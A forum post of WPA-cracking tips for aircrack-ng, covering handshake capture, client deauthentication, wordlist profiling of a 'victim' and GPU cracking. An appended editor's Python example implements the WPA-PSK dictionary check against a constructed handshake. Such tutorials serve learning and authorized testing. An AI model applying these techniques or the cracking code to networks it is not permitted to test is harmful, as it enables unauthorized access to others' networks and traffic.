Wifi, Backtrack, cracking WEP and WPA...



Visit the shop, your authorized Alfa Network reseller: selected Wifi hardware, Awus036h and Awus036nh USB Wifi cards, omni, yagi and panel antennas, wifi amplifiers, accessories...

#1 20-02-2012 02:00:46

[email protected] (Mister_X)

Re: [Aircrack-ng] WPA cracking tips and tricks

WPA is at the same time easy and hard to crack. It is quite easy because all you need is to get the handshake (with WEP, you need a lot of data frames). It is hard because getting the handshake can be tricky and also because cracking can take a lot of time (due to the passphrase length, 8 to 63 characters).

Important notes:
- Never forget to read the documentation in the wiki.
- Don't hack an AP you don't own or if you don't have the permission to do it.

There are several things to consider when getting the handshake:
- You need to be somehow close to both the AP and the client. If you only have the client, you should use airbase-ng to get the client to connect to you.
- If RXQ is below 70 then there is a good chance you'll get a partial handshake which will be unusable.
- You MUST be on the same channel as the AP (in airodump-ng, you will see the RXQ column when on a fixed channel).
- It is not necessary to keep deauthenticating the client, once or twice should be more than enough. And let the client reconnect in order to get the handshake. Each time aireplay-ng tells you it sent a deauthentication, it sent 128 or 256 deauth frames.
- If you still don't get the handshake after reading the wiki and those tips, then you might want to have a look at the WPA Packet Capture Explained tutorial in the wiki to help understand what's going on.

Tip: It is always a good idea to clean up the capture to include one beacon and the handshake before cracking it or submitting it to an online cracking service. The reason is that YOU select the handshake to crack and don't let the tool on those services select the handshake (which might be the wrong one).

It might sound funny but it is true: there is a 0% chance to crack it if the passphrase is not in the dictionary (and a 100% chance when it is in the dictionary). So what you want to do is profile your victim when cracking the handshake, to include words/phrases related to it. You can also find a few tools on BackTrack such as John The Ripper that will help you mangle the dictionary and "add" new words.
If you need to generate phrases such as numbers, check out 'crunch'.
Note that aircrack-ng doesn't mangle the wordlist and doesn't do any permutation, it just tries each passphrase against the handshake. And in case you want to be able to 'pause' the cracking, use John The Ripper to output to stdout and pipe the results to aircrack-ng (using -w -).
GPU cracking makes cracking much faster. One of the best solutions for that is oclHashcat-plus (and it is much faster than pyrit).

Now that you've cracked the handshake, you might want to verify it. People have been trying to connect to the AP but it is the wrong way of checking since there are a lot of variables involved (such as distance, MAC filtering, bad drivers, etc.) that will prevent you from connecting even if the passphrase is valid.
So what you have to do is use airdecap-ng.
With WPA, since what you get with the handshake is a session key for a specific device, you can only decrypt the traffic after the handshake for that device. Don't be fooled by airdecap-ng giving 0 frames decrypted when there are a few data frames encrypted with WPA, there might not be any traffic from that device after the handshake. That is why it is very important to be able to understand a capture file.
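Added example (editor's code, not part of Mister_X's post and not taken from aircrack-ng): the per-candidate check that a WPA/WPA2-PSK dictionary attack actually performs, which is why the "0% if it is not in the dictionary" remark above holds. It derives the PMK from the candidate passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 rounds), expands it to the PTK with both MAC addresses and both nonces, and recomputes the Key MIC of handshake message 2 with the KCK; only a candidate that reproduces the captured MIC is the passphrase. The handshake it runs against is constructed locally from a known passphrase (SSID, MAC addresses, nonces and the RSN IE are all made-up assumptions), so it runs offline without a capture file. The wordlist is any iterable of strings, which is the same shape as lines piped in from `john --stdout`.

```python
# Added example (not from the post above or from aircrack-ng itself):
# the per-candidate check of a WPA/WPA2-PSK dictionary attack, run against a
# handshake constructed locally from a known passphrase.
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Optional

# Byte offset of the 16-byte Key MIC inside an EAPOL-Key frame
# (4-byte 802.1X header + 77 bytes of fixed key-descriptor fields).
MIC_OFFSET = 81


@dataclass
class Handshake:
    """The pieces of a 4-way handshake that a cracker actually needs."""
    ssid: bytes
    ap_mac: bytes
    client_mac: bytes
    anonce: bytes      # from message 1 (AP -> client)
    snonce: bytes      # from message 2 (client -> AP)
    eapol: bytes       # message 2 EAPOL-Key frame with the MIC field zeroed
    mic: bytes         # the MIC captured in message 2


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the slow step, which is what GPU crackers speed up."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MAC addresses and both nonces (sorted, as the standard requires)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """Key MIC over the EAPOL frame (MIC field zeroed), keyed with KCK = PTK[0:16].
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1."""
    version = struct.unpack(">H", eapol_zeroed[5:7])[0] & 0x0007
    if version == 1:
        return hmac.new(kck, eapol_zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def split_mic(eapol_frame: bytes):
    """Return (frame with MIC zeroed, captured MIC) for a raw EAPOL-Key frame from a capture."""
    mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return zeroed, mic


def check_passphrase(hs: Handshake, passphrase: str) -> bool:
    """True if this candidate reproduces the captured MIC."""
    pmk = derive_pmk(passphrase, hs.ssid)
    kck = derive_ptk(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate exactly as given (no mangling, like aircrack-ng -w);
    the wordlist may be any iterator, e.g. lines piped from john --stdout."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not 8 <= len(word) <= 63:   # outside the WPA passphrase length range
            continue
        if check_passphrase(hs, word):
            return word
    return None   # 0% chance: the passphrase was not in the dictionary


def build_sample_handshake(passphrase: str) -> Handshake:
    """Constructed handshake for a made-up network; every value here is an assumption."""
    ssid = b"TestNet"
    ap_mac = bytes.fromhex("00c0ca0a0b0c")
    client_mac = bytes.fromhex("001122334455")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP, PSK
    body = (struct.pack(">BHH", 2, 0x010a, 0)           # descriptor type, key info (v2, pairwise, MIC), key length
            + (1).to_bytes(8, "big")                     # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + bytes(16)                                  # MIC field, zero while computing it
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    eapol = struct.pack(">BBH", 2, 3, len(body)) + body  # 802.1X v2, EAPOL-Key
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, eapol, eapol_mic(kck, eapol))


if __name__ == "__main__":
    hs = build_sample_handshake("correct horse battery")
    print(crack(hs, ["password", "12345678", "letmein1"]))               # None
    print(crack(hs, ["password", "correct horse battery", "letmein1"]))  # correct horse battery
```

`derive_pmk("password", b"IEEE")` reproduces the PSK test vector from the 802.11i specification, which is a quick way to check the derivation before trusting a negative result. Note that the MIC is only ever checked against the EAPOL frame of one message, so a capture with a partial handshake (no message 2 or 4 for that client) gives this code nothing to compare against, which is the same reason the tips above insist on a complete handshake.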



Similar topics

Topic | Replies | Views | Last post
[Aircrack-ng] Lesser known features of Aircrack-ng, by [email protected] (Mister_X) | 0 | 432 | 27-03-2017 21:31:28 by [email protected] (Mister_X)
[Aircrack-ng] iw monitor mode flags, by [email protected] (Mister_X) | 0 | 368 | 21-02-2017 06:47:25 by [email protected] (Mister_X)
aircrack-ng, by baltigor | 2 | 464 | 30-11-2016 20:46:48 by koala
Aircrack WPA key incorrect !!!, by Youbix [ 1 2 ] | 25 | 1179 | 12-08-2016 11:53:18 by Seska
Failed Aircrack-ng, by regard48 [ 1 2 ] | 30 | 1692 | 13-07-2016 20:42:42 by Fab955
